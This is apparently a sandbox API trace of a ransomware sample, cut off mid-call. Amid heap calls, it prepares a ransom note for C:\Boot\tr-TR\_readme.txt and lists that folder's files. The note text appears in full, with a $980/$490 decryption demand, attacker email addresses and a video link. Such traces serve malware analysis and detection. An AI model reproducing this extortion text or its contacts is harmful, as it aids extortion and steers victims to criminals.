RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.860] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.860] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.860] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.860] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.860] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.860] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.860] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.861] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.861] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.861] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.861] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.861] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.861] PathFindFileNameW (pszPath="C:\\Boot\\tr-TR\\") returned="tr-TR\\" [0209.861] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.861] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0209.861] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0209.861] PathFindFileNameW (pszPath="") returned="" [0209.861] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.861] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x761b0000 [0209.862] GetProcAddress (hModule=0x761b0000, lpProcName="SHGetFolderPathW") returned 0x76235708 [0209.862] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x800) returned 0x3a83058 [0209.862] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3a83058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0209.862] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x810) returned 0x32d9428 [0209.862] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.862] FreeLibrary (hLibModule=0x761b0000) returned 1 [0209.862] PathAppendW (in: pszPath="C:\\Boot\\tr-TR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\tr-TR\\_readme.txt") returned 1 [0209.862] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.862] PathFileExistsW (pszPath="C:\\Boot\\tr-TR\\_readme.txt") returned 0 [0209.863] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x7d00) returned 0x3a87060 [0209.864] lstrcpyW (in: lpString1=0x3a87060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" [0209.864] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0209.864] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32da538 [0209.864] CreateFileW (lpFileName="C:\\Boot\\tr-TR\\_readme.txt" (normalized: "c:\\boot\\tr-tr\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0209.864] FindFirstFileW (in: lpFileName="C:\\Boot\\tr-TR\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0209.865] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0209.865] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0209.865] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0209.865] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0209.865] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.865] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.865] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.865] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.865] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.865] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.865] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.865] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.865] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.865] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.865] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.865] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.865] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.865] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.866] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.866] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.866] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.866] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.866] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.866] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.866] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.866] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.866] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.866] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.866] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.866] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.866] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.866] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc2e) returned 0x3a83058 [0209.866] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.866] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.866] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.866] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.866] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.866] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.866] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.866] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.866] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.866] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.866] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.867] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.867] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.867] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.867] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.867] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.867] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.867] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.867] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.867] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.867] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.867] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.867] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.867] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.867] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.867] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.867] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.867] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.867] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.867] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.867] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.867] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.867] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.867] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.867] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.867] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.868] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.868] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.868] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.868] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.868] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.868] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.868] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.868] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.868] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.868] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.868] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.868] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.868] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.868] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.868] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.868] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.868] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.868] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.868] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.868] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.868] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.868] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.868] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.868] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.869] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.869] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.869] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.869] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.869] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.869] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.869] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.869] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.869] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.869] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.869] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.869] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.869] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.869] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.869] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.869] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc2e) returned 0x3a83058 [0209.869] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.869] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.869] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.869] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.869] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.869] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.869] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.869] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.869] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.870] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.870] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.870] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.870] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.870] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.870] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.870] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.870] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.870] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.870] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.870] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.870] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.870] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.870] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.870] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.870] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.870] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.870] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.870] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.870] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.870] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.870] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.870] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.870] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.871] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.871] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.885] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.885] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.885] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.885] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.885] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.885] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.885] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.885] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.885] HeapFree (in: hHeap=0x750000, dwFlags=0x0, 